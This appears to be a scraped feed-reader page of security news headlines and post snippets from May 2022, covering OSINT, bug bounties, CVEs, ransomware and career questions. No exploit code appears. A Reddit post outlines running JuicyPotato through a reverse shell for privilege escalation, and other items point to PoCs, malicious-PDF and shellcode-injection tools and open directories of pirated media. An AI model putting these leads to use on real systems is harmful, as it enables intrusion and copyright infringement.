    Category: OSINT  Difficulty: Easy  Challenge Author: Blarthogg  Team: OsirisProtocol (https://ctftime.org/team/151343/#.Ynh0zJJAj_s.link) Continue reading on Medium »
    War in Ukraine / May 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The Cyber Institute — OSINT Challenge 3
    Hi everyone;  Here I go with a write up of my third challenge from the course OSINT Challenge developed by The Cyber Institute.   The main… Continue reading on Medium »
    War in Ukraine / May 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    reconDNS
    It was also developed with the aim of automating and facilitating the work of cybersecurity professionals. Continue reading on Medium »
  • Open

    Hackers are actively exploiting BIG-IP vulnerability with a 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31319852 Points: 14 # Comments: 3
  • Open

    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Dev Genius »
    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Medium »
    FFUF (Fuzz Faster U Fool)
    Atualmente nos CTFs e walkthroughs que estou realizando, seja no Hack The Box ou no TryHackMe, quando preciso realizar um web fuzzing… Continue reading on Medium »
  • Open

    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Dev Genius »
    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Medium »
    FFUF (Fuzz Faster U Fool)
    Atualmente nos CTFs e walkthroughs que estou realizando, seja no Hack The Box ou no TryHackMe, quando preciso realizar um web fuzzing… Continue reading on Medium »
  • Open

    Next steps into entering the field
    So I graduated last year with a degree in Digital Forensics and Information Assurance. A month before graduation I landed a job doing IT help desk support for my city. We do a massive range of things from running cable, to troubleshooting and resolving network issues, to other general IT stuff. I’ve even been working on getting an IR plan developed and put into place with the City I work for. It’s great experience and I’m really liking it but I do believe that I need to look into getting into my specific field within the next couple of years. My question is, will this IT job help me with finding a IR/SOC type job in the future experience wise, and what jobs should I be looking for in order to get into the field(entry level positions and such). Mainly just deciding how much time I should actually spend in this position where it won’t be a big waste of time career wise. I’m always learning new things, but I also know the job is not directly in the career path I’m pursuing. submitted by /u/brinkv [link] [comments]
    The Case of the Disappearing Scheduled Task
    Good morning, It’s time for a new 13Cubed episode! This one is based upon a Microsoft Detection and Response (DART) blog post (see Resources section). I, along with two of my colleagues (Johnathan Sykes and Meaghan Bradshaw), performed extensive research regarding two different methods by which it is possible to create "hidden" Scheduled Tasks. While one of the methods has been discussed before, this research shows how it might be leveraged by a Threat Actor. The second technique, as best we can tell, is novel. Episode: https://www.youtube.com/watch?v=xrd0w505aS8 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    GCFA practice exam giveaway.. anyone
    Hi All, Just checking if any veteran can help me out with an extra GCFA practice exam give away. Recently failed it and reappearing :) submitted by /u/Mushroom-Fuzzy [link] [comments]
  • Open

    Learning Linux kernel exploitation – Part 2 – CVE-2022-0847
    Article URL: https://twitter.com/0xricksanchez/status/1523633205630619648 Comments URL: https://news.ycombinator.com/item?id=31316513 Points: 3 # Comments: 0
    F5 BIG-IP RCE exploitation (CVE-2022-1388)
    Article URL: https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html Comments URL: https://news.ycombinator.com/item?id=31316045 Points: 2 # Comments: 0
  • Open

    Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
    submitted by /u/SCI_Rusher [link] [comments]
    Vulnerability Analysis - CVE-2022-1388 - Randori
    submitted by /u/zxcvqwerpl [link] [comments]
    POC for CVE-2022-1388
    submitted by /u/scopedsecurity [link] [comments]
    Expanding on Existing IoCs to Leverage Immediate Threats Simulations
    submitted by /u/bayhitlaw [link] [comments]
  • Open

    Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-05-09 Review
    【D3FEND】网络安全对策知识图谱框架解读 by ourren SecWiki周刊(第427期) by ourren 从500到账户接管 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-09 Review
    【D3FEND】网络安全对策知识图谱框架解读 by ourren SecWiki周刊(第427期) by ourren 从500到账户接管 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Windows Recon: Host Discovery
    Hello, today I will show you some of the ways in which we can perform a host discovery in windows. Continue reading on Medium »
    Red, Blue & Purple Team: Attacker, Defender & Facilitator
    Introduction:  Building an effective & secure platform is critical! In this era of rising technologies, it is becoming more and more… Continue reading on Medium »
    Malicious PDF Generator
    Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh Continue reading on Medium »
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    What to do if you receive a strange email with random letters and numbers?
    I have received this morning an email coming from "Veronika Mccreadie" and the problem is: It appeared in my main page instead of spam. It has only random numbers and letters in the whole email. It has something attached. So I need to know what to do with this. I haven't even opened it just in case it can do anything hahaha yeah, I'm that paranoid. submitted by /u/chem_OS [link] [comments]
  • Open

    FreeBuf早报 | 高合汽车陷隐私泄露风波;马斯克收购推特恐面临安全调查
    据爆料,高合汽车的行车记录仪可通过车主互联功能接收其他高合汽车的信号,并读取这些汽车行车记录仪内容。
    勒索软件BlackByte出现新变种,系Go语言编写
    BlackByte 是一个功能齐备的勒索软件家族,使用多种技术进行攻击且持续升级样本,这可能会对组织数据安全构成重大威胁。
    如何解包 Python 恶意可执行文件
    打包好的 Python 程序如何获取源码,提高分析效率?
    美国宣布制裁为朝鲜黑客洗钱的 Blender
    美国财政部表示 Lazarus 通过 Blender 已经洗钱超过 2050 万美元,正式宣布制裁加密货币混合服务提供商 Blender。
    Google Play中止俄罗斯用户付费应用程序下载更新
    谷歌将禁止俄罗斯用户和开发者从 Google Play 商店下载或更新付费应用程序。
    Lazarus武器库更新:Andariel近期攻击样本分析
    Andariel 团伙主要攻击韩国的组织机构,尤其是金融机构,以获取经济利益和开展网络间谍活动。
    注意,NIST更新了网络安全供应链风险指南
    指南提供了与供应链攻击相关的趋势和最佳实践,指导企业有效管理软件供应链风险,以及在遭受供应链攻击时该如何进行应急响应。
    美国农业机械制造商AGCO遭遇勒索软件攻击
    近期AGCO宣布其公司遭受勒索软件攻击并影响了其部分生产设施。
    美国悬赏 1500 万美元寻求勒索软件团伙Conti 的关键人物信息
    为了能帮助识别和定位臭名昭著的勒索软件团伙 Conti 的主要核心人员及同谋,美国国务院开出了1500 万美元的高额赏金。
    “网安新势力”首期节目上线,Solo发布季金句连连
    北京绎云科技CEO陈坤鹏成为首位嘉宾,带来了有关实名制数据访问安全网格的分享。
  • Open

    Japanese ASMR ear licking videos and audio works.
    submitted by /u/MrRoboto12345 [link] [comments]
  • Open

    JBoss EAP/as <= 6.* RCE 及 rpc 回显
    作者:Y4er 原文链接:https://y4er.com/post/jboss-4446-rce-and-rpc-echo-response/ 看到推上发了jboss的0day rce,分析一下。 前言 这个洞是在国外Alligator Conference 2019会议上的一个议题,ppt在这里 https://s3.amazonaws.com/files.joaomatosf.com...
  • Open

    JBoss EAP/as <= 6.* RCE 及 rpc 回显
    作者:Y4er 原文链接:https://y4er.com/post/jboss-4446-rce-and-rpc-echo-response/ 看到推上发了jboss的0day rce,分析一下。 前言 这个洞是在国外Alligator Conference 2019会议上的一个议题,ppt在这里 https://s3.amazonaws.com/files.joaomatosf.com...
  • Open

    Fuzzing
    Hello all, I'm new into exploit development and I was wondering what common tools are used to fuzz gui applications. All the tutorials I have seen are used to fuzz command line applications. Thanks. submitted by /u/PuzzledWhereas991 [link] [comments]

  • Open

    Career in computer forensics pretty much over.. need some advice/support (more details in post)
    Hey all, long time lurker here. I’ve been in computer forensics for a bit now and loving it. But sadly something has happened recently that has well, shot my career in this field in the head. Quick background, I work in a state police child exploitation unit (won’t say exactly where, but western states and the weather is beautiful right now) doing forensics. Without getting into any details, it came about that not only myself but 15+ others I know were victimized when we were in middle school. It gets worse than that but that’s the spark notes. To say it’s been traumatic is an understatement. I haven’t been to work in a few weeks and I’ve had a chat with my boss and we both agree it’s not a job I can keep doing. I gotta chase down a bunch of stuff and I’m trying my best to take care of myself (seeing a therapist, gone straight edge, working with my doc, thank god for health insurance lol) but shits been rough man. Has anyone seen or experienced something similar? Any advice? Most importantly, computer forensics isn’t something I’m likely to have the capacity to do moving forwards given my mental state (worried about PTSD). Do you know of any fields with an easy lateral transition or transferable skill sets? I’ve been thinking of cyber security if I can swing it, but I’d rather stay gov’t if I can for the benefits as I’ll need them. submitted by /u/59472993757 [link] [comments]
    A starter's guide on recovering damaged and rotten CDs
    TL;DR: I'm Using ddrescue/dvdisaster/testdisk and photorec to recover data from a disc rotten CD Prettier version of this post is available here. The First Hurdle-Reading data from a Damaged CD / DVD The first problem anyone’s with a damaged disc going to encounter, is that they cannot copy files from it using a regular copying mechanism (eg:. file explorer, terminal commands). This is due to the fact that, normal file copying mechanisms will not attempt to read from a bad sector or unreadable data. Instead, they will freeze, or throw an error upon encountering such data. To recover data from a damaged medium, we need specialized tools that are aware of this problem and will continue with the reading process, even after encountering errors. Three of such tools are ddrescue , dvdisast…
  • Open

    Email Spoofing due to Invalid SPF Record Vulnerability
    Supp Folks! Continue reading on Medium »
    How I Paid For My Holiday With Bug Bounty
    Today I am detailing how I was able to afford a holiday utilising Bug Bounty only. Continue reading on Medium »
    P1 Bug — PII information disclosure
    Hello amazing penetration testers and bug bounty hunters, I hope you all are fine ❤ In this blog I will be explaining the bug that I… Continue reading on Medium »
    Can analyzing javascript files lead to remote code execution?
    In today’s blog, I’m going to show you how analyzing javascript files can lead to access unrestricted endpoints and to understand how the… Continue reading on Medium »
    How to Find bugs on Dutch Govt……..!
    i have posted my swag on social media n etc so getting lots of DM how we can find vulnerability (bug) in dutch govt sites what can be the… Continue reading on Medium »
    Nmap Basic commands — 1
    Introduction Continue reading on Medium »
    Dockerize your hacking workflow
    I’ve been a fan of containerization for a long time. I do not want to create a flame post; all I want to say is that there are situations… Continue reading on Medium »
    Html Injection Web Application Vulnerability : Introduction Part
    What Is HTML Injection? Continue reading on Medium »
    What happened to me
    Today I will write about one of my recent findings which lead to a $4000 bounty issue. I will publish at 11 PM IST. Continue reading on Medium »
    Worst Bug bounty sites you should avoid
    Hi Hunters! Continue reading on Medium »
  • Open

    What positions should a self-taught developer with 3 years experience in IT security apply to?
    Hi all, I have 3 years IT security experience (mix of auditing/compliance/user support) for a major company, and I am a self-taught developer (MERN stack). I have a degree unrelated to CS. I'm having trouble figuring out what positions to apply to. If I apply to web development positions, they don't seem to care about my IT/security background at all. It's basically just how well I know their (exact) stack. If I apply to security engineering positions, they seem to care more about what certs I have, networking knowledge, and things of that nature, and my programming skills don't seem as relevant. It feels like I'm not a perfect fit for either position. There must be a job title/position that utilizes my specific background. I'm curious about specific job titles and roles. submitted by /u/C4KggxcEJlTefYKisLJE [link] [comments]
    Transfer 2FA Tokens from GAUTH to Authy?
    Is this possible? I can duplicate the Tokens to another Instance of GAUTH for example on a 2nd smartphone via QR Codes. Can I also duplicate or export/import those tokens from GAUTH to authy? All I'd have to do is export the secret and type it into authy. But does the QR Code generated by GAUTH contain the secret ? ​ Thx for enlightening me. submitted by /u/junghansmega4 [link] [comments]
  • Open

    Mac Software, Images, Videos, and much more
    submitted by /u/ilikemacsalot [link] [comments]
    Music?
    Is music now off the table? Haven't seen any new posts for a while. submitted by /u/Top-Nefariousness908 [link] [comments]
  • Open

    SecWiki News 2022-05-08 Review
    智能电表安全之通讯分析 by ourren OffensiveNotion: Notion as a platform for offensive operations by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-08 Review
    智能电表安全之通讯分析 by ourren OffensiveNotion: Notion as a platform for offensive operations by ourren 更多最新文章,请访问SecWiki
  • Open

    HintInject
    Embedding shellcode into the PE Hint/Name Table https://github.com/frkngksl/HintInject submitted by /u/DarkGrejuva [link] [comments]
  • Open

    I started a newsletter and would love your feedback
    submitted by /u/nunorbatista [link] [comments]
  • Open

    Good News Roundup: the OSINT-inspired Geek Edition
    Today’s Good News Roundup has OSINT news, AI and robotics breakthroughs for health & human rights, & news about the Navalny app in Russia Continue reading on Medium »
    The Future of the Internet — METINT & METfluence?
    What is the future of OSINT, cyber HUMINT, and online influence? One only needs to look Mark Zuckerberg, who decided to rebrand Facebook —… Continue reading on Medium »
    NahamCon CTF 2022: OSINT Challenge
    NahamCon CTF 2022 is a gamified cyber security event and part of free virtual security conference Hosted by STOK, John Hammond and… Continue reading on Medium »
    Web Archive as an OSINT Tool
    Using web archives allows you to see what a web page or site looked like in the past. Most popular web archives: https://archive.org/… Continue reading on Medium »
    War in Ukraine / May 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    SPY NEWS: 2022 — Week 18
    Summary of the espionage-related news stories for the Week 18 (1–7 May) of 2022. Continue reading on Medium »
  • Open

    Reflected xss in https://sh.reddit.com
    Reddit disclosed a bug submitted by abhiramsita: https://hackerone.com/reports/1549206 - Bounty: $5000
  • Open

    IDOR: a simple and very dangerous vulnerability
    Hello guys! Continue reading on Medium »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager in your windows, you will see a process running called ‘lsass.exe’. LSASS (Local Security Authority Server… Continue reading on Pentester Nepal »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager in your windows, you will see a process running called ‘lsass.exe’. LSASS (Local Security Authority Server… Continue reading on Medium »

  • Open

    Hiding Your EXE In Alternate Data Streams
    submitted by /u/Diesl [link] [comments]
  • Open

    How advanced are (photo) image forensics at present?
    I am not in this field; I am a photographer/software person. I've been researching image forensics, but haven't quite got a straight answer on this: Is it plausible or even possible for someone to take a photograph with a digital camera, make edits to that photograph that make non-trivial changes to its appearance, and then hide these adjustments through technical skill, software designed for such a job or otherwise fudging EXIF info etc, resulting in an image that can't be identified as fake with forensic analysis, be it automated tools or even someone literally checking each block of data? submitted by /u/MonstrousPourings [link] [comments]
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    Code4rena — First 1M$ stats
    After 14 months of grinding Code4rena audit contests I’m the first person to hit 1M$ in awards and take the number one spot on the… Continue reading on Medium »
    Text Based Injection | Content Spoofing on ISRO Website
    Content spoofing, also referred to as content injection, “arbitrary text injection” or virtual defacement, is an attack targeting a user… Continue reading on Medium »
    The $16,000 Dev Mistake
    Hello all! Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : Prevention Part
    Prevention Continue reading on Medium »
  • Open

    Mr.Holmes — Osint Tool
    Mr.Holmes é uma ferramenta de coleta de informações (OSINT). Seu objetivo principal é obter informações sobre domínios, nome de usuário e… Continue reading on Medium »
    Intelligence Gathering with Open-Source Tools
    Intelligence gathering is becoming increasingly important to organizations today. Continue reading on Medium »
    Collection of data about companies in Russia and around the world
    Today we will study publicly available sources that can be used to study Russian and foreign counterparties, as well as assess their… Continue reading on Medium »
    Cosa sarebbe l’OSINT senza… l’OSINT?
    Il titolo non vuole assolutamente essere clickbaiting ma un almeno po’ provocatorio si. A chi dovesse imbattersi nei risultati di una… Continue reading on Medium »
    War in Ukraine / May 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Storing Decryptable Passwords in DB for Automation Usage
    TLDR I am making a REST Session management solution for industrial automation purposes and need to automatically log into devices to perform configurations. NOTE: These devices are 99% of the time going to be isolated to private networks/VPNs (i.e., Will not have a public IP) Dilemma I am being tasked with creating a service that can store hardware device credentials so automated configurations (& metrics scraping) can be done. The hardware in question only allows REST Session logins via a POST method where the user and (unencrypted) password are sent in the message body. This returns a Session cookie that my service then stores (in memory). The service in question consists of a Linux (Ubuntu 20.04) server running: FastAPI python backend SQLITE3 embedded file DB Storing Credentials? My background is not in Security so this is all very new to me but it seems that I should prefer storing a hash (e.g., bcrypt) of my password in my DB for future verification however there will not be any future verification as this is all automated. This brings me to what seems like is the only solution - hashing the password and using that (somehow) to seed the password encryption, then storing the hashed password & encrypted password in the DB for decryption purposes later. I know this provides almost 0 security given the DB is compromised but I am at a loss for alternate solutions. Given the DB is embedded, maybe there is some added assurance that the server itself would have to be compromised before the DB itself is compromised? I don't know if there is a technical "right" approach to this, maybe not, however if anyone has any advice I am all ears.   NOTE: I do not control the authentication type for the devices my service has to authenticate to. User/Pass Session-based auth is the only way atm so JWT or token-based auth is out of the question submitted by /u/jmehrs [link] [comments]
    Trying to run JuicyPotato through a PowerShell script, but I get "recv failed with error: 10038"
    I have a reverse-powershell session to a Windows Server 2016 VM as the built-in IIS user (nt authority\iusr), and since the OS is vulnerable to this exploit, I'm trying to run JuicyPotato to execute a bat file as SYSTEM. However I am facing a problem: it looks like I can't create new processes, so uploading the exe and running it through my shell is not an option. The way I decided to solve this problem is by using the process I already have, the reverse powershell process. So I converted JuicyPotato into a DLL that exports the main() function, and I wrote a small PowerShell-compatible C# script that P/Invokes it and executes the exploit. But when I try to run it, I get the following error: COM -> recv failed with error: 10038 I know for a fact that using this exploit through PowerShell is possible, because I've tried it in a second VM with Defender disabled and it worked. I also know that the target system can create TCP listeners as the iusr user (the error seems to be a socket error), because that's how I have a fully functional reverse shell. So what gives? Looking at JP's source code, it looks like it failed to read from a TCP listener socket for some reason, but I don't understand why. Recreating this scenario for testing is very simple: Create a VM with Windows Server 2016 Datacenter Edition Configure IIS with PHP Make sure that Defender is enabled Drop a reverse-shell PHP script into wwwroot and connect to it Upload my modified JuicyPotato DLL and the ps1 script that runs it, or create your own by downloading the JP source code, change the output type to DLL and add this function to it. Run the ps1 script through your remote shell Any help is appreciated. submitted by /u/Sparky2199 [link] [comments]
    Offensive security, remote US jobs for an EU dude
    How feasible or likely is to find a job in US offsec sector (possibly remote) for someone who lives in Germany of EU citizenship? EDIT: Thanks everyone for all your answers, they are pretty much what I expected. Thinking of a mid-career transition into infosec from software engineering within next couple of years, so I walk around asking different infosec groups, perhaps stupid questions, but I wanted to make sure that I see all opportunities and all consequences of going for this change. submitted by /u/andy-codes [link] [comments]
  • Open

    Huge amount of Movies, TV Shows, and other Videos
    http://203.96.191.70/Data/ Has been posted before, but its back online again. submitted by /u/amritajaatak [link] [comments]
    A lot of nostalgia Flash games (fast download speed too)
    http://mahergames.ru.ma/uploads/ submitted by /u/Pelicaros [link] [comments]
  • Open

    SecWiki News 2022-05-07 Review
    使用 Sonarr 搭建自动化追番系统 by ourren flybirds: 基于自然语言的,跨端跨框架 BDD UI 自动化测试方案 by ourren 初探Java安全之JavaAgent by SecIN社区 supplier: 主流供应商的一些攻击性漏洞汇总 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-07 Review
    使用 Sonarr 搭建自动化追番系统 by ourren flybirds: 基于自然语言的,跨端跨框架 BDD UI 自动化测试方案 by ourren 初探Java安全之JavaAgent by SecIN社区 supplier: 主流供应商的一些攻击性漏洞汇总 by ourren 更多最新文章,请访问SecWiki
  • Open

    Default Credentials Cheat Sheet
    One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password Continue reading on Medium »
  • Open

    XXE 从0到1
    XML作为可扩展标记语言,在于任何应用中读/写数据,成为数据交换的公共语言。
    美国商务部机构建议这样生成软件供应链 “身*份*证”
    本手册概述了软件物料清单(SBOM)的生成流程,以及软件供应商提供它们的方式。
    对mssql提权原理的探索
    本次就这些提权方式的原理进行分析,做一个小结,有不妥之处希望各位师傅能指正。
    戟星实验室工具篇之人人都可以成为_弱密码大师_
    blaster是一款强大的弱密码隐患检测工具,用于网站登录弱密码检测。
    hackmyvm系列8——REI
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    从防御者视角来看APT攻击
    本文会将APT防御方法分为三类,分别是:监控、检测和缓解技术,并分别进行梳理。
    研究人员警告:“Raspberry Robin”或正通过外部驱动传播
    近日,网络安全研究人员发现了一种新型Windows恶意软件,其具有类似蠕虫的功能。
    《网络安全标准实践指南——个人信息跨境处理活动认证技术规范(征求意见稿)》发布
    《实践指南》从基本原则、相关方在跨境处理活动中应遵循的要求、个人信息主体权益保障等方面提出了相应的要求。
    乌克兰 IT 军团和匿名者组织,持续攻击俄罗斯实体
    匿名者黑客组织伙同乌克兰 IT 军继续对俄罗斯实体发起网络攻击。
    QNAP修复了关键的QVR远程命令执行漏洞
    QNAP发布了几项安全公告。
    FreeBuf周报 | DNS漏洞影响数百万物联网设备;攻击者劫持英国家卫生系统邮件帐户
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」。
    FreeBuf早报 | Xbox 在全球范围内出现故障;宜家加拿大发现数据泄露
    微软表示,Xbox Live 服务因严重中断而停机,全球多地客户无法启动或购买游戏。
    因未能披露挖矿对业务的影响,英伟达被罚550万美元
    英伟达承认未能充分披露挖矿对其游戏业务的影响,同意向美国证券交易委员会支付550万美元的罚款。
    什么是IP冲突以及如何解决?
    当同一网络上的两台或多台设备分配了相同的 IP 地址时,就会发生 IP 地址冲突。
    网安新势力solo发布季企业正式公布,5月9日上午10点准时起航!
    9家企业正式公布,网安新势力solo发布季下周一见!
    从《风起陇西》看企业数据安全
    时下“三国+谍战”题材电视剧《风起陇西》正在热播,在这个天下三分,烽烟四起的战场上,不仅有刀光剑影,秘密情报的交锋也涌动于滚滚洪流的阴影当中。
    【星课堂】快速入门:如何使用Suricata构建网络入侵检测系统?
    Suricata是一个免费、开源、成熟、快速、健壮的网络威胁检测引擎。
  • Open

    Exploiting IRCTC along with few other government domains through XXE
    submitted by /u/rotoutjog [link] [comments]
  • Open

    Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞分析
    作者:f-undefined团队 f0cus7 原文链接:https://mp.weixin.qq.com/s/sxj7Yn9m2JolLkuP1BGc5Q 去年一整年Cisco RV34x系列曝出了一系列漏洞,在经历了多次修补之后,在年底的Pwn2Own Austin 2021上该系列路由器仍然被IoT Inspector Research Lab攻破了,具体来说是三个逻辑漏洞结合实现了R...
  • Open

    Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞分析
    作者:f-undefined团队 f0cus7 原文链接:https://mp.weixin.qq.com/s/sxj7Yn9m2JolLkuP1BGc5Q 去年一整年Cisco RV34x系列曝出了一系列漏洞,在经历了多次修补之后,在年底的Pwn2Own Austin 2021上该系列路由器仍然被IoT Inspector Research Lab攻破了,具体来说是三个逻辑漏洞结合实现了R...
  • Open

    Fuzzing ClamAV with real malware samples
    Article URL: https://mmmds.pl/clamav/ Comments URL: https://news.ycombinator.com/item?id=31291190 Points: 2 # Comments: 0

  • Open

    KaijuKingz P2E Bug Bounty
    Introduction Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on System Weakness »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on Medium »
    I Hacked all of the School Websites in my Town.
    So let’s begin the BLOG. When I got admission to my college,  I noticed that my school had a website. As a Website Pentester and a Curious… Continue reading on Medium »
    How We hacked (bypassed) Admin Panel just by Js file
    Hello world! Continue reading on Medium »
    2FA Bypass in PickMyCareer.in
    I found a 2fa bypass recently in a responsible disclosure program — pickmycareer.in . Continue reading on Medium »
    Zero-day vulnerability and money
    A simple definition would be that a zero-day vulnerability is a vulnerability in a system or device that is not yet patched. An exploit… Continue reading on Medium »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today i’am gonna share my experience about how i able to chaining some vulnerabilities into Full Account Take Over… Continue reading on System Weakness »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today i’am gonna share my experience about how i able to chaining some vulnerabilities into Full Account Take Over… Continue reading on Medium »
  • Open

    digital forensics..help
    Hey guys and gals. Years ago I was taking online classes for digital forensics... Never finished due to personal family issues.. had a two year old at the time and was working two jobs going to class at midnight one in the morning was really starting to take its toll... As the years of passed and my son is finally older I'm really thinking now is the time that I finish what I started... However I went to DeVry and they are currently under lots of fire... Could anyone recommend a free or relatively inexpensive online certification class or something that I could take to dip my toes back in the water?! Thank you in advance!! submitted by /u/Ok-Acanthaceae-4568 [link] [comments]
    Specifying GPG Decryption Key
    I'm working on a digital forensics project involving data recovery. Suppose I have the encryption key (not the passphrase, the actual key) for a file encrypted with GPG symmetric encryption and the encrypted file. How could I go about decrypting the file? Is there a way to specify the use of a specific key for GPG decryption instead of a passphrase? I've considered just trying to decrypt the file content with Python, but GPG uses its own variant of CFB mode, making this a somewhat complicated endeavor. submitted by /u/metal_oarsman [link] [comments]
  • Open

    Multiple IDORs in family pairing api
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1286332 - Bounty: $7500
    SQL injection in URL path processing on www.ibm.com
    IBM disclosed a bug submitted by asterite: https://hackerone.com/reports/1527284
    Able to bypass email verification and change email to any other user email
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1551176 - Bounty: $5000
  • Open

    Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding
    Cobalt Strike’s metadata encoding algorithm contributes to its versatility and usefulness for red teams and threat actors alike. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding appeared first on Unit42.
  • Open

    Home-Grown Red Team: Creating A Red Team Development Workstation
    Having a good red team development workstation is essential for creating payloads, testing out new tools and keeping your work organized… Continue reading on Medium »
    My eCPPT journey
    Since I passed my eJTP in October, I decided to continue with INE and go for eCPPT(which can help for my oscp). Continue reading on Medium »
    Container breakout: CAP_SYS_ADMIN via Creating a cgroup
    Prerequisites: Continue reading on Medium »
  • Open

    Any ideas on how to search ODs for Shopify themes?
    They come in a zip file and always have these subfolders assets config layout locales sections snippets templates I don't know how I can narrow my search to those parameters, anyone know? submitted by /u/Loli_of_Bread [link] [comments]
  • Open

    SecWiki News 2022-05-06 Review
    域控被突破的几种途径 by ourren 自定义跳转函数的通用unhook方法 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-06 Review
    域控被突破的几种途径 by ourren 自定义跳转函数的通用unhook方法 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Rubygems CVE-2022-29176 explained
    Article URL: https://greg.molnar.io/blog/rubygems-cve-2022-29176/ Comments URL: https://news.ycombinator.com/item?id=31285049 Points: 2 # Comments: 0
  • Open

    CloudFlare Pages, part 1: The fellowship of the secret
    submitted by /u/albinowax [link] [comments]
    Fuzzing ClamAV with real malware samples
    submitted by /u/mmmds [link] [comments]
  • Open

    La vejez como catalizador del terror
    “Envejecer no está tan mal si tenemos en cuenta la alternativa” Continue reading on Medium »
  • Open

    Check and locate phone number in OSINT
    The first thing to do to identify a phone number is to establish its belonging to the region and telecom operator, and also to check its… Continue reading on Medium »
    OSINT: Do I have to Capture The Flag(CTF)? Pt1.
    Maybe I'll plant one instead! — make your own CTF Continue reading on Medium »
    War in Ukraine / May 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    CyberSoc | Cyber Investigator CTF Writeup
    CTF này được tạo bởi Jack T tại CyberSoc, Hiệp hội An ninh Mạng tại Đại học Cardiff. Đây là một sân chơi dành cho các bạn yêu thích về… Continue reading on Medium »
  • Open

    《北京市数字经济全产业链开放行动方案(征求意见稿)》发布,数据要素价值是关键
    为贯彻落实市委市政府关于加快建设全球数字经济标杆城市的战略部署,北京市经济和信息化局制定了《北京市数字经济全产业链开放行动方案(征求意见稿)》。
    白宫:破解量子计算机密码已准备就绪
    近日,美国总统乔•拜登签署了一份国家安全备忘录(NSM),旨在要求政府机构采取措施,减轻量子计算机对美国国家网络安全构成的风险。
    微软、苹果和谷歌将支持FIDO无密码登录
    微软、苹果和谷歌联合宣称,计划加大对万维网联盟和 FIDO 联盟开发的通用无密码登录标准的支持。
    谷歌修复了积极利用的Android内核漏洞
    近期谷歌发布了Android的5月安全补丁的第二部分,其中包括对积极利用的Linux内核漏洞的修复。
    数百万用户受影响,杀毒软件Avast中潜藏近10年的漏洞被披露
